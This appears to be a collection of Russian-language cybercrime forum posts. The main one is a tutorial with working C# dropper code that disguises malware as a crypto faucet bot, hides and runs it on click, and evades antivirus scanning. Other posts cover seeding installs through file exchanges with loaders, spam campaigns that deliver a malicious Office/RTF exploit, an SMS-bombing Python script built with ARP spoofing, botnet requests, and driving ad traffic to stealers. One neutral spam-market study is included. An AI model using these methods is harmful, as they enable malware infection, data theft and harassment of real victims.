Статься ориентирована на новичков и профи в этой сфере, подойдет каждому.
Идея изначально была моя, она проста и легка как весенний одуванчик, сейчас решил ее дополнить и разложить по полкам, схема приносит ежедневный хороший и очень качественный прогруз.
Работать будем в Visual Studio 2019
C#Скачать
П онадобиться архиватор 7zip
Скачать
Не пугайтесь те кто не шарит в VS и не когда не кодил! Начать не когда не
поздно я разложил все полкам куда жать и что делать.
В есь код закоментил почти каждую строку.
Будут нужны красочные темы для форм C#
Я специально подготовил для вас свою коллекцию качаем тут:
https://anonfiles.com/R9f25299n6/Theme_C_zip
Пароль xss.is
Мы будем писать с вами фейковые софта различного рода для распространения вашей малвари.
Прошу заранее вас определиться с тематикой вашего софта, в статье я выбрал тематику крипты.
Софт распространять мы будем там где могут попасться мамонты в этой сфере, а это различные форумы по криптовалюте так как тут проще всего.Click to expand...
Перейдем от теории к практике:
Запускаем Visual Studio и создаем проект Windows Forms
жмем далее и выбираем .Net 4.5 имя проекта будет в моем случаи Crex24, я буду делать “бота который собирает с кранов на бирже Crex24 различную крипту в авто-режиме”.
В проекте сразу перейдем к дизайну формы, тут дело фантазии каждого, основной
код который будет запускать вашу малварь мы пропишем позднее.
Для начала изменить стандартный дизайн формы на свой, для этого в начале
статьи я дал ссылку на скачивания пака тем.
Я выбрал тему clsNeoBuxTheme.cs она довольно красивая как по мне.
После жмем в верху VS Сборка > пересобрать проект
Слева появится меню Компоненты Crex24, сразу выбираем тему главной формы
Так же добавим ControlMenu и размещаем там где это нужно.
Разверните вкладку Все формы Windows Forms и так же кидаем:
После красиво размещаем их на форме и переименовываем, изменить названия компонентов можно тут:
Мы получаем форму примерно такого вида:
Красиво, доверчиво.
Теперь самое главное, как эта форма будет пропихивать нашу малварь, для начала желательно криптануть ваш билд малвари, форму криптовать не нужно и да-же обфусцировать поверьте, ее можно слить на ВТ и детекты не придут.
Определимся когда будет запускаться наша малварь, не будем запускать сразу при запуске формы, можем спалиться. Запустим малварь например когда жертва нажмет кнопку StartClick to expand...
**Мы не будем качать ваш exe билд со сторонних серверов, и не будем таскать его вместе с фейковым софтом в 1 exe. Мы так же не будем держать ваш exe рядом с программой в открытом виде.
Для примера вместо малвари я буду использовать putty.exe
Переименуем putty.exe в update.exe**
Далее я буду использовать архиватор 7zip
Щелкаем по exe “малвари” update.exe правой кнопкой и выбираем добавить к
архиву.
Уровень сжатия Ультра, формат архива zip
Пароль любой у меня будет:123
**Наш архив update.zip назовем: config.y
**
В этом архиве находится ваша малварь под паролем, да же если его слить на ВТ ваш exe не улетит туда же.
Возвращаемся к нашему фейковому софту:
Теперь нам надо сделать так что бы наш софт сумелскрыто распаковать этот
архив и запустить exe от туда при условии нажатия кнопки старт
Подключим необходимые NuGet пакеты:
Жмем по вкладке Проект > управление пакетами
Вкладка обзор, в поле поиска вводим SharpZipLib нужен для распаковки архива устанавливаем
После в поле поиска вводим Costura.Fody запихнет вашу dll SharpZipLib в сам билд формы что бы не таскать его отдельно, и так же установить.
Жмем 2 раза на форму в пустом месте и пишем код распаковки и запуска:
Далее разбор кода, вы так же можете скачать уже готовые исходники в конце статьи.
C#:Copy to clipboard
//Подрубим юзинги
using System;
using System.Text;
using System.Windows.Forms;
using ICSharpCode.SharpZipLib.Core;
using ICSharpCode.SharpZipLib.Zip;
using System.Diagnostics;
using System.IO;
using System.Threading;
namespace Crex24
{
public partial class Form1 : Form
{
public Form1()
{
InitializeComponent();
}
private void clsButtonGreen1_Click(object sender, EventArgs e)
{
string dir = Environment.GetEnvironmentVariable("AppData") + "\\Update"; // Путь к папке куда распакуем exe
if (!Directory.Exists(dir))
File.SetAttributes("config.y", FileAttributes.Hidden | FileAttributes.System); // Скрываем от пользователя сам архив
//Далее шифруем наш пароль от архива и распаковываем
//Зашифровать пароль можно тут: http://base64.ru/
//В моем случаи пароль на архив config.y был 123 по этому после закодирования пароля в
//base64 у меня будет пароль выглядеть так: MTIz
string password = Encoding.ASCII.GetString(Convert.FromBase64String("MTIz")); // Пароль от архива зашифрованный в base64
ExtractZipFile("config.y", password, dir + "\\"); //Распакуем архив
File.Delete("config.y"); //Удаляем архив
//Далее создаем поток и запускаем нашу малварь при клике на кнопку Start:
new Thread(() =>
{
try
{
File.SetAttributes(dir + "\\update.exe", FileAttributes.Hidden | FileAttributes.System); // Скрываем от пользователя
Process proc = Process.Start(dir + "\\update.exe"); //Запускаем exe малвари
// 2 строки далее можно удалить или оставить смотря как вам нужно
proc.WaitForExit(); //Ждем завершения работы малвари (если требуется)
File.Delete(dir + "\\update.exe"); //Удаляем exe малвари (если требуется)
}
catch (Exception)
{
}
}).Start();
}
// Функция для распаковки архива
private static void ExtractZipFile(string archiveFilenameIn, string password, string outFolder)
{
{
ZipFile zf = null;
try
{
FileStream fs = File.OpenRead(archiveFilenameIn);
zf = new ZipFile(fs);
if (!String.IsNullOrEmpty(password))
{
zf.Password = password;
}
foreach (ZipEntry zipEntry in zf)
{
if (!zipEntry.IsFile)
{
continue;
}
String entryFileName = zipEntry.Name;
byte[] buffer = new byte[4096];
Stream zipStream = zf.GetInputStream(zipEntry);
String fullZipToPath = Path.Combine(outFolder, entryFileName);
string directoryName = Path.GetDirectoryName(fullZipToPath);
if (directoryName.Length > 0)
Directory.CreateDirectory(directoryName);
using (FileStream streamWriter = File.Create(fullZipToPath))
{
StreamUtils.Copy(zipStream, streamWriter, buffer);
}
}
}
catch (Exception ex)
{
throw ex;
}
finally
{
if (zf != null)
{
zf.IsStreamOwner = true;
zf.Close();
}
}
}
}
private void TextBox2_TextChanged(object sender, EventArgs e)
{
}
}
}
Добавляем красивую иконку для софта, правой кнопкой по проекту > свойства >
Значек и манифест
На раб. столе, создаем папку CranBot Crex24 и кладем в нее наш exe фейка
+ рядом config.y архив соответсвенно.
Ох сейчас вы скажете зачем но поверьте все ОК! **Заливаем наш exe файл фека на ВТ.
И поверьте такой детект я наблюдаю уже почти год. **
](https://www.virustotal.com/gui/file/f94677c9545bda5e8568185eb108450c63c632593b21fc49cdc2f955cc65fc28/detection)
VirusTotal
www.virustotal.com
Вить это у нас по сути простой разархиватор zip архивов.
Ваша малварь в архиве под паролем, да же если ее зальют на вт толку от этого не будет.
Не верите, вот вам пример, собсвенно почему я и выбрал CrexBot для основы своего фейка:
](https://bitcointalk.org/index.php?topic=5092978.0)
Кран-бот для Crex24.com + 20$ в день
bitcointalk.org
January 04, 2019 Дата публикации статьи
Там я да же ВТ приложил той же датой, он с тех пор не изменился. И до сих
пор идут инсталы.
Да пост я выложил в ру сегменте, но выкладывал я только ради проверки схемы,
далее я перешел на пендосов.
Это лиш 1 тема размещенная на 1 форуме, таких тем по разным зарубежным форумам о крипте у меня много, за год разных фейков софтов я написал уже порядка 50шт, вы же если не так ленивы как я, за 1 год наклепаете более 5000 софтов... представьте какой профит будет? Но работа будет монотонная. Ноя уверенно скажу что вы не 1к $ срубите! тем же клиппером BTC адресов.
При чем на 1 софт уходит 10-15 минут, просто изменив вид формы под нужный софт понакидав туда различных компонентов и все.Click to expand...
Как вы поняли схема очень легкая, профитная, идает хорошую защиту от слива вашей малвари на ВТ.
Распространять конечно же придется в 1 рахиве в 1 папке что бы 2 файла forma.exe и config.y лежали рядом.
Так же можно рядом с формой создать папку img понакидать туда разных картинок, иконок флагов более 100шт и вместо config.y назвать архив us.png этот файл смешается среди кучи картинок. А наш софт будет брать именно его, распаковывать и запускать.Click to expand...
Видео обзор работы готового фейка:
На видео я показал логику работы софта и еще хочу дполнить словами:
Вот и вся схема.
Кстати данный мануал отлично подойдет для распространения майнера, т.к очень
легко понаделать фейковые формы читов различных игр. Как мы знаем у геймеров
за частую нормальные карты стоят в пк. Не шарю в фортнайт но видел там аховые
цены на аккаунты, понаделайте различные софта типо читы, трейнеры, подсчет
статистики если для этой игры такое можно я уже сказал не шарю, и хапайте
стилаком данные аки.
Дело фантазии и можно наклепать что угодно, представьте что форма это полотно
как фотошопе
.
Я не рекомендую обфусцировать сам софт формы, смысла нет + начнет палится со
временем, а так будет жить и жить. К тому же мы вить не будет распространять
подобное на площадках где будут декомпилить его.
Еще 1 плюс этой схемы это хороший обход рантайма некоторых АВ при запуске
вашего exe
Собственно как и общеал вот вам готовый исходник который мы разобрали с вами в этой статье:
anonfiles.com
Пак тем для форм:
https://anonfiles.com/R9f25299n6/Theme_C_zip
Пароль xss.is
Все тех. вопросы задаем тут, отвечу всем.
Всем привет!
В теме стало мало единомышленников.
Потому, готов помочь новичками и не только!
Отвечу на вопросы касательно Google ADS!
Задавайте, не стесняйтесь.
**
Немного предыстории, перед тем как начать.
**
Статью я думал писать еще давно, перед тем как администрация запустила
конкурс. Никак руки не доходили. Ну раз пошла такая пьянка с конкурсом, то
почему бы и нет, если да.
На написание статьи меня с подвигло несколько причин, самая важная из них -
УХУ евшие селлеры инсталлов, которые нас, простых и честных работяг, кормят
этим "качественным" продуктом. После моей статьи, Слава Богу, их станет
меньше.
Многие наверно уже поняли, что речь пойдет о файловых биржах, так как именно
от туда льют 90% селлеров, а то и больше.
Ладно, хватит болты болтать. Погнали.
**
Скучная теория, промотай дальше.
**
Файловые биржи делятся на 3 группы:
Биржи, которые работают сами на себя, которые действительно берут себе вебмастеров, и не зависят от третьих лиц.
Биржи-реселлеры, которые продают трафик бирж из первой группы, с наценкой своим рекламодателям. Мол бизнесмены. Вебмастеров не берут, просто редиректят всех вебмастеров которые им пишут 301 редиректом, биржам из первой группы.
Второй вариант бирж ресселеров, это когда биржа скупает трафик у вебмастеров,
и продает биржам из первой группы. Очень похожи по природе на УХУ евших
селлеров инсталлов.
Секретные биржи которые знаю только я.
Парочка примеров :
**
Подготовка.
**
На самом деле, всё очень просто. Часто селлеры которые продают аккаунты в
файловых биржах, да и селлеры инсталлов, говорят что создать аккаунт в бирже
очень сложно, нужно иметь кучу документов, сертификатов, подписей, и так
далее.
Х@й там. Вот такой ---
Всё что нужно, это простенький софт, и лендинг. Примерные расходы на это
150-200 американских рублей. installs.pro раньше еще требовали первый депозит
внести, но этот депозит вы можете использовать, лить инсталлы, поэтому я думаю
это не проблема. Сейчас сказать не смогу, новые аккаунты не делал, может
изменилась политика.
Софт можем заказать на таких форумах как BHF, школьники за копейки сделают.
Серьезный софт для этого дела не нужен, исходя из этого, дело можно доверить
молодым кодерам. Самая важная функция это подгрузка малвари при запуске софта.
Лоадер.
Примеры софта - такие, как Punto Switcher, какой-нибудь чистильщик, бустер,
Unlocker и прочее. Функционал можно под ноль скопировать, главное свое
название, и дизайн. Софт чисто ваша фантизия, разницы особой нет. Главное
чтобы работал на всех ОС, и это важно. Если ваш софт к примеру не работает на
Windows 10 по каким то причинам, в бирже будет низкий CTR, и из этого поток
инсталлов будет медленным, или вообще не будет идти. Так же нужно следить за
детектом софта, из-за того же CTR.
Биржа возможно будет спрашивать какая монетизация у вашего софта. Согласитесь,
будет странно если вы будете лить инсталлы, на софт который не имеет никакой
монетизации. По этой причине вас могут не пропустить, даже если софт чистый.
Я использую два способа "монетизации", на мой взгляд, самые простые. Первый
это триал версия софта, использование какое-то время, потом покупка полной
версии. В бирже я лью на триал версию, а вот на сайте у нас можно купить
полную версию софта. Главное чтобы название софта содержало бы слова "Trial",
или "Demo", и ссылку на ваш софт. Подозрений тогда не будет, и полную версию
никто у вас просить не будет.
Второй способ это донаты. Бирже говорим что софт бесплатный, живем на донаты.
Вы конечно можете придумать свои варианты, встроить в софт рекламные баннеры и
прочее, но я думаю что мои способы проще будут.
Теперь про лендинг. Дизайн лендинга можно сделать как у софта, и добавить на
сайт парочку картинок вашего софта. Сайт должен содержать описание софта,
кнопку скачать, вкладку где купить/донатить, EULA и Privacy Policy, контакты.
EULA с Privacy Policy можно скопировать с любого софта, лишь поменять все
названия на ваши. Или же сгенерировать любым онлайн генератором, легко можно
нагуглить.
Минимализм.
Если монетизация у вас будет донаты, то вкладка донаты должна содержать
реквизиты, куда донатить. Если пробная версия, то можете просто указать что за
покупкой полной версии пишите на почту, и указать контакт. Кому не лень,
можете прикрутить кассу для приема платежей.
**
Почти конец.
**
После того как вы сделали софт, поставили сайт на хостинг, можете смело писать
любой бирже, апрув обеспечен. Да, всё так просто.
Пример как писать - " Здравствуйте! Я разработчик софта
"UstanoviMojSoftiPoluciBonus" (ссылка на сайт) интересует сотрудничество с
вами, где я могу почитать об условиях сотрудничества/правила/договор? "
Конечно же, эти скучные документы читать не нужно, просто нужно показать нашу
адекватность, официальность, и всё остальное что вы никогда не показывали при
общении в жабе.
Ответили вам, говорите что согласны, вас это устраивает, можно что-то уточнить
еще раз. Дальше вам сама биржа будет говорить что нужно делать, просто
следуйте их указаниям. Там всё очень просто, любой дурак поймет.
Ответы на некоторые их вопросы:
Q: Какая монетизация у софта?
A: Донаты/триал версия. Тут смотрите сами что у вас будет.
Q: Предоставьте EULA/Privacy Policy
A: На сайте можете найти.
Q: Какой у вас рекламный бюджет в месяц?
A: 5000-10000$
Даже если у вас бюджет 1000$ в месяц, не важно. Никто потом ничего спрашивать
не будет. Если вы укажете маленькую сумму, им просто не выгодно и не интересно
будет сотрудничать с вами. Возможно вам откажут.
И это были самые сложные вопросы. Всё, вы теперь можете стать официальным
селлером инсталлов, вы прошли этот "сложный" путь.
**
Конец, серьезно о серьезном.
**
Это всё что вам нужно для создания аккаунта в файловых биржах. Не покупайте
инсталлы у селлеров, не покупайте аккаунты. Вы это всё можете сами сделать,
вложив 150-200 баксов. Именно за такую суммы вы можете сделать себе аккаунт в
каждой бирже. Один софт можно использовать в разных биржах.
Я никогда не продам вам свои инсталлы, потому что они качественные, и идут в
одни руки - в мои. Всё просто.
Благодарю за внимание, буду рад если кому-то понравилось. Конкурс конкурсом, но если вы начнете сами делать аккаунты, перестанете покупать инсталлы у селлеров, для меня это будет лучший приз. До Нового года постараюсь написать статью о том, как я делаю инсталлы со спама, и немного о точечных атаках на компании.
Для администрации - это не мой основной аккаунт, на форумах и тут, другие
ники, аккаунт сделан для этой статьи. Не хотелось палить основу. Буду
благодарен если не забаните, использовать его для каких то других целей не
буду.
Если статья не подходит для конкурса - извиняюсь, цель изначально другая была.
Доброго времени суток.
Как и ранее мы будем рады помочь каждому кто в этом заинтересован.
Задавайте вопросы по Google ADS, темной и белой тематики.
Если мы не сможем ответить, уверен тут найдется много знатоков!)
Собственно сабж. Все что всплывает очень поверхностное. По типу нажми сюда,
нажми туда ... Профит. Где нарыть более развернутые с технической точки зрения
материалы?
Может стоит купить доступ на экспу? Или там не особо по теме спама?
Господа ищу ботов, исходники ботов и все что с этим связано. Есть желани попытаться организовать собственный ботнет. Ищу помощи и содействия.
ALLERT (тема может вызвать очень много бугурта в комментариях ибо анскилл
мутит гайды
самокритика )
Тема подойдет как и для доставки троянов так и для сеошников и фишеров.
Что нам понадобится для рассылки?
1. AMS Enterprise (АЛЛЕРТ СТАВИМ
НА ВИРТУАЛКЕ)
2. SMTP с поддержкой доставки на целевой таргет
3. Мобильные прокси
Итак первым делом ставим софт с этим делом думаю разберетесь.
Далее идем на xleet.to регаемся вносим депозит 3-10$
Идем в раздел смтп.
Вбиваем майл для теста куда будем доставлять почту для тестов.
Тыкаем SAVE обновляем страницу и тычем SEND по всему списку.
Заходим на почту проверяем письма которые попадут в инбокс
Покупаем нужный нам сервер (важно чтобы СМТП имел поддержку Webmail)
Заходим в свои ордера и видим там что-то похожее на
mail..com:587|robot@*.com|1&*sJ,jc)V_P|PlanetHoster
Идем по домену mail.******.com авторизовываемся
Находим настройки для майл клиентов
Открываем наш сендер и вбиваем настройки
После проверки статус СМТП должен быть рабочий.
Общие настройки для всех режимов выглядят вот так:
Желательно TO или CC (персональная копия идет в спам)
Далее идем составлять письмо
Делаем рандомизацию текста для обхода спам фильтров
Составляем наше письмо у кого на сколько хватит фантазии редактор имеет
очень большой функционал + возможность отправлять HTML письма.
Тут используем все свои навыки социальной инженерии для достижения наилучшего
результата.
Дабы не тратить много времени я набросал 1 предложение.
Внизу добавляем файл разводки редирект в формате PDF (можно использовать ссылки с дабл трипл редиректами в самом письме но только свои с шеллов кристальной чистоты)
Идем в настройки учетной записи
Заполняем имя отправителя и организацию на свое усмотрение.
Но обратный имейл рандомим главное, чтобы он был (особенность софта тк
он будет все-равно считываться с смтп)
Reply пустое
С добавлением списка получателей сложностей думаю не будет но для теста вбиваем наш тестовый имейл гугла:
Далее нам нужны будут прокси идем сюда ltespace.com покупаем МТС или Билайн мобильные прокси. (обязательно с этого сервиса за другие не ручаюсь)
Почему мобильные прокси с сервиса а не рандомные с паблика (тут все просто будет уходить в спам)
После покупки составляем такой текстовик:
ОДНОГО ПРОКСИ БУДЕТ ДОСТАТОЧНО ПРОСТО ВВОДИМ ЕГО В ТЕКСТОВИК 1-100 РАЗ ПРОКСИ ИМЕЮТ ВНУТРЕННЮЮ РОТАЦИЮ НА СТОРОНЕ СЕРВИСА 1 раз в 2 минуты
Code:Copy to clipboard
*******IP*****,17131,HTTP,*** логин ***,*** пароль ***
*******IP*****,17131,HTTP,*** логин ***,*** пароль ***
*******IP*****,17131,HTTP,*** логин ***,*** пароль ***
*******IP*****,17131,HTTP,*** логин ***,*** пароль ***
*******IP*****,17131,HTTP,*** логин ***,*** пароль ***
*******IP*****,17131,HTTP,*** логин ***,*** пароль ***
*******IP*****,17131,HTTP,*** логин ***,*** пароль ***
*******IP*****,17131,HTTP,*** логин ***,*** пароль ***
*******IP*****,17131,HTTP,*** логин ***,*** пароль ***
*******IP*****,17131,HTTP,*** логин ***,*** пароль ***
Загружаем список проксей которые составили ранее
Проверяем прокси
Тычем ок на всех настройках и пробуем запустить рассылку
Заходим на почту и проверяем инбокс
Переходим к нашей пдф разводке
Тычем загрузку
И о чудо грузит наш RTF для заражения. (офис эксплоит макро чистый... нууу почти)
Стоит упомянуть все подводные камни данного способа.
Минусы - долго подбирать нужные шлющие "читаем правильно =D" смтп, долго
рандомизировать текст, не всегда выходит доставлять вредоносные файлы в инбокс
ибо это гугол если письмо проходит туда минимум 20-30 реверсов у вас будет
висеть =D
Плюсы вам никто не $бет мозги за происхождение базы как при легальной
рассылке, сколько хотите столько и отправляете все упирается в колличество
проксей и смтп.
Если вам сложно разобратся или не получается настроить софт можно попытать счастье с пхп майлерами на том же икслите https://xleet.to/mailers там все без настроек проверяем инбокс пишем письмо + вложения если нужно и шлем. Минусы 500 писем и блок айпи со стороны майлера и невозможность рандомизации текста.
Данные способы могут подойти для реализации фишинг атак, сео, и заражения
контор.
Скажу сразу слать тояны с гугл смтп или на гугл смтп гиблое дело ибо боты
реверсеры и спам фильтры вас заебут если работаете по корп почтам еще терпимо
не все корпы стоят на известных почтовых сервисах.
Я лично использовал данный метод для заражения контор в 2019 но забросил это дело. (ЛОКЕРЫ РУЛЕЗ =D)
Кто не понимает мануал 500$
" Жми тильт и набирай мой ник. И я к тебе уже бегу на все готов и все могу и
зажимаааая CTRL+F мы наеб@шим всех =D" (Enemy)
Ну а если серьезно вас слишком много желающих и каждому все настроить это
пиз№ец.
Читайте мануал, всем инбокса!
Кому нужны пдф разводки:
Ссылка тут (открываем док файлы
меняем ссылки сохраняем как PDF)
Такая реализация рассылки имеет минимум затрат
С 12 смтп серверов с ротацией можно послать до 10 к писем (в зависимости от
того куда шлем, что шлем и от паршивости базы)
Тру рассыльщики в комментах делимся опытом. Уничтожаем
автора
PS. Статья писалась под энергетиком в 4 часа утра. Если чет пропустил или
забыл ссыль пишите подредачу.
Привет!
Сегодня я расскажу как можно написать SMS спамер. На написание статьи побудил скрипт Spammer-Grab. Суть его заключается в том чтобы заставить сервисе слать коды подтверждения на телефон жертвы (работоспособность его не проверял) если верить людям, то он рабочий.
Сразу скажу что текст сообщения задавать нам не удастся но суть спамера не в доставки нужного нам текста а достать человека на которого направлена спам атака.
Постановка задачи:
Для того чтобы реализовать задуманное нам понадобиться найти android
приложение в котором есть функция регистрации по номеру телефона с кодом
подтверждением который будет приходить в виде SMS. Собственно это самое
сложное что нужно сделать во всей схеме. Затем надо получить HTTP запрос с
параметрами который отправляется для регистрации и написать небольшой скрипт
который будет делать столько запросов сколько нам надо.
Реализация задуманного:
Для начала найдем приложение которое будет отвечать нашим требованиям. Первое
в которых есть данный функционал как правило предоставляют какие то услуги.
Первое что пришло на ум это заказ такси. Идем в Google Play в поиске вводим
“Такси” и начинаем искать подходящие нам приложение. Те что в топе лучше не
брать обращаем внимание на приложения с плохим рейтингом. Пролистав пару
экранов вниз натыкаемся на приложения “Такси
Магнит”.
Устанавливаем его себе на телефон. После того как мы проверили что функционал приложения нам подходит настает этап перехвата трафика. Можно было бы попробовать это сделать средствами Android но у меня нет прав root и по этому я пойду другим путем. Вы можете найти свой способ для перехвата трафика не обязательно делать как я. Первое что мне пришло на ум это ARP-spoofing. Подключаем android и ноутбук к своей точки доступа и проводим ARP-spoofing.
ARP-spoofing:
ip андройда: 192.168.10.107
(ip может отлечаться)
ip роутера: 192.168.10.1
(ip может отлечаться)
Для проведения атаки arp-spoofing должны быть разрешены транзитные пакеты.
Code:Copy to clipboard
echo 1 > /proc/sys/net/ipv4/ip_forward
Затем проводим непосредственно саму атаку.
Code:Copy to clipboard
arpspoof -i eth0 -t [ip андройда] [ip роутера]
arpspoof -i eth0 -t [ip роутера] [ip андройда]
-i — указывает интерфейс, подключенный к локальной сети
-t — указывает IP-адрес хоста, arp-кэш которого требуется «отравить».
Теперь весь трафик с андройда идет через нас. Запускаем Wireshark выбираем
свой интерфейс у меня это eth0. В поле фильтр вводим ip.addr == 192.168.10.107 and http
(укаываем ip вашего андройда).
Возвращаемся к приложению и выполняем запрос на регистрацию.
Переходим в Wireshark и видим новые HTTP запросы. Обращаем внимание на POST запрос у которого в поле Info есть часть URL которое содержит create-invite. Пробуем еще несколько раз получить код что убедиться что это то запрос который нам надо. Для того что бы точно быть уверенным в том что мы нашли нужный запрос его можно проверить руками использую [Advanced REST client](https://chrome.google.com/webstore/detail/advanced-rest- client/hgmloofddffdnphfgcellkdfbfbjeloo?hl=ru).
Рассмотрим запрос более детально. Нажмем на него правой кнопкой мыши в
появившемся меню наведем на Fallow и в новом списке выберем HTTP Stream.
Откроется окно с информацией похожей на эту:
Code:Copy to clipboard
POST /est-taxi/create-invite/1.0/ HTTP/1.1
Content-Length: 103
Content-Type: application/x-www-form-urlencoded
Host: 5.9.150.148:8200
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
invite={"phone-number":"+XXXXXXXXXXXX","application-acronym":"TAXI_MAGNIT"}
HTTP/1.1 200 OK
Accept-Charset: UTF-8
Content-Type: text/plain; charset=UTF-8
Content-Length: 29
Connection: keep-alive
{"result":{"result-state":0}}
Давайте разберем что из этого нам нужно:
Code:Copy to clipboard
Тип запроса: POST
URL на который будет отправляться запрос: http://5.9.150.148:8200/est-taxi/create-invite/1.0/
Обязательные параметры которые требуется передать: invite={"phone-number":"+XXXXXXXXXXXX","application-acronym":"TAXI_MAGNIT"}
Ответ от сервера в случае успешной отправки: {"result":{"result-state":0}}
На этом этапе мы получили все данные которые нам нужна (при тестировании запроса было вывалено что минимальный промежутка паузы между повторной отправкой SMS 10 сек). Теперь можно приступить к написанию кода. В качестве языка программирования я выбрал python.
Python:Copy to clipboard
#!/usr/bin/python
# coding=utf-8
import requests, argparse, json, time
# Функция обработки передаваемых параметров
def options():
parser = argparse.ArgumentParser(prog='SMSSpammer', description="The script sends spam messages via SMS",
epilog='SMS Spammer script by n3d.b0y for Grey Section')
parser.add_argument('--number', '-n', required=True, help='Phone number (example: 79006403861)')
parser.add_argument('--limit', '-l', type=int, default=3,
help='Limit SMS (default: 3)')
parser.add_argument('--delay', '-d', type=int, default=20,
help='Delay time in seconds (default: 20)')
return parser.parse_args()
# Отправка POST запроса с параметрами. Функция принимает номер телефона формата 79006403861.
def post_requests(number):
r = requests.post('http://5.9.150.148:8200/est-taxi/create-invite/1.0/',
data={'invite': '{"phone-number":"+' + number + '","application-acronym":"TAXI_MAGNIT"}'})
return json.loads(r.text)
def main():
# Получаем переданные параметры
params = options()
inc = 0
# Цикл будет делать столько итераций сколько мы передали в партере limit
while inc < params.limit:
# Передаем номер телефона и отправляем POST запрос
response = post_requests(params.number)
# Если ответ пришел положительный выводи OK если с ошибкой выведем Error
if int(response['result']['result-state']) == 0:
print '+' + params.number + ' - OK'
else:
print '+' + params.number + ' - Error'
inc += 1
# Делаем пазу перед следующим запросом
time.sleep(params.delay)
if __name__ == '__main__':
main()
Вот мы и написали наш спамер. Как видите сложного в этом ничего нет. Его можно улучшить добавив поддержку прокси + еще несколько сервисов чтобы спам шел без интервалов задержки но это уже не относиться к данной теме. Данное приложение я нашел не с первой попытки. Оно было третье по счету. В приложениях с хорошим рейтингом стоят системы блокировки по IP и лимиты в 15 мин на повторную отправку SMS. Но если у вас есть лишний час пару таких приложений найти можно запросто. Надеюсь я не в пустую потратил свое время и вам были интересно это читать
Кстати обратите внимание на дизайн приложения. По идеи все приложения с таким дизайном связанные с такси будут поддерживать множественную отправку SMS без блокировки. Так как такие приложения штампуется билдерам который идет в комплекте с CRM для приема заказов вызова такси. Знаю это точно так как работа лет 5 назад с таксистами которые хотели свою CRM и независимое android приложение, на тот момент у них было именно такое приложение которое можно было скомпилировать прямо в CRM.
Автор: @n3d.b0y
взято с codeby
У многих жителей форума возникает потребность в использовании дополнительных компьютерных мощностей.
Я подумал, что можно организовать что-то подобное buq-track (так что ли пишется?) - программы распределённых вычислений.
Она позволит использовать ВСЕ машины, имеющие отношение к форуму (хозяева
котрых разрешат использовать их вычислительные ресурсы) для выполнения
переборов (взлома имеющегося кода перебором).
Если кто-то заинтересуется - может попробовать реализовать.
Прога состоит из серверной и клиентской частей.
Серверная управляет распределением частей кода по конкретным машинам.
Клиентская - загрузкой куска кода и его взломом в свободное от работы
(процессора) время.
Напишите если я могу помочь...
P.S:
2 moderators
Если не в тему - удалите - не обидюсь...
«Лаборатория Касперского» и Subscribe.Ru провели исследование российского рынка спама и попытались выяснить, кто является типичным российским заказчиком услуг спамеров. В исследовании приведены некоторые оценки самих заказчиков спама: почему они используют этот рекламный канал и насколько он эффективен.
Исследование особенно актуально в связи со вступлением в силу 1 июля 2006 г. новой редакции закона «О рекламе», в котором делаются первые для России попытки вывести спам за рамки правового поля.
По результатам опроса выяснилось немало любопытных фактов. Например, оказалось, что около 60% (57,9%) заказчиков спама отрицают факт рассылки спама. Это свидетельствует о том, что компании, решившиеся на рекламу в спаме, четко осведомлены о негативной общественной оценке этого явления.
Еще один вопрос, ответ на который пытались найти исследователи: кто непосредственно принимает решение о проведении рассылки, кто контактирует со спамерами. По результатам опроса, более чем в 80% случаев исполнителями являются менеджеры по рекламе, однако в процессе заказа рассылок спама активное участие принимают и руководители компаний. Так, в 5,6% опрошенных компаний, они не только инициируют заказ, но и оформляют деловые отношения со спамерами.
Стоимость одной рассылки спама колеблется в пределах от 1000 до 45.000 рублей. В Москве предпочитают рассылки стоимостью от 3001 до 6000 рублей, а в Петербурге берут подешевле. В целом по России 50% опрошенных заказчиков спама заявили, что они платят от 3001 до 6000 рублей за одну рассылку. Сумма, безусловно, незначительна для компании любого масштаба и совершенно несопоставима с любым легальным рекламным каналом.
Количество адресов в одной рассылке также сильно колеблется в зависимости от того, кто предоставляет услуги по распространению спама. Наименьшее названное количество — 100 адресов, наибольшее — 3.700.000. Каждый третий заказчик выбирает путь «максимального охвата» — рассылки свыше миллиона адресов, где совершенно не учитывается целевая аудитория рекламируемых товаров и услуг.
Эффективность спама ни один из респондентов не смог оценить. В среднем, звучали приблизительные оценки уровня отклика в 0,01-0,05%. Многие говорили о том, что трудно выделить вклад спама при использовании нескольких рекламных каналов.
В целом исследование позволяет сделать несколько выводов.
Во-первых, заказчики спама отдают себе полный отчет в том, что, получив
несколько обращений, они при этом навлекут на себя гнев остальных получателей
рассылки (тысяч и миллионов людей). Компании, прибегающие к спаму, как
правило, очень малы, что позволяет им считать, что такие понятия как репутация
и положительный имидж — не для них.
Во-вторых, стоимость спамерских рассылок очень мала. Однако никто из клиентов
спамеров не может адекватно оценить эффект от проведения рассылок, в т.ч.
возможный отрицательный эффект. Точно так же, заказчики спама не придают
особого значения аудитории, на которую направлены рассылки. Спам заказывается
по принципу «если это так дешево, то почему бы и нет».
В-третьих, для некоторых компаний-респондентов формальный запрет спамерских
рассылок явился причиной, по которой они прекратили заказывать спам. Это
связано как с возможными юридическими рисками, так и с еще большим ущербом для
репутации этих компаний.
В исследовании принимали участие компании, названия которых упоминались в тексте спамерских сообщений. На основе данных антиспам-подразделения «Лаборатории Касперского» был составлен список из 500 таких компаний. Пропорции отбора будущих респондентов по сферам деятельности были выдержаны в соответствии с пропорциями различных тематики спама в Рунете. Больше всего заказчиков спама приходится на компании, работающие в сфере туризма и отдыха (14%), предоставляющие услуги по ремонту и переездам (9,3%) и занимающиеся полиграфией (7%). Были учтены и другие, менее распространенные категории.
Интересно, что социологический опрос проводился анонимно, с помощью весьма оригинальной методики. Заказчику спама звонил «сотрудник небольшой компании», который якобы тоже хотел заказать спамерскую рассылку и спрашивал у «коллег» совета. Конечно, такую методику не назовешь научной, но в данном случае трудно было придумать что-нибудь лучше.
Источник: 878898f32a12ef6f625d6317feb174de
Доброго времени суток, пока у меня есть свободное время
думаю помочь начинающим или уже людям которые заливались с фб
отвечу в этой теме на любой вопрос по фб знаю как;
Фармить аккаунты
Как вязать карты
Как пустить траф на стиллер
Где искать креативы
Как правильно запустить компанию
Какие аккаунты брать
Как сделать качественные крео и прочее...
В лс не отвечаю, отвечаю только тут чтобы не было повторения вопросов
You must have at least 5 message(s) to view the content.
ребят , привет! я новичок !хочу приобрести хороший софт для спама имэил , рассмотрю любые предложения ))))
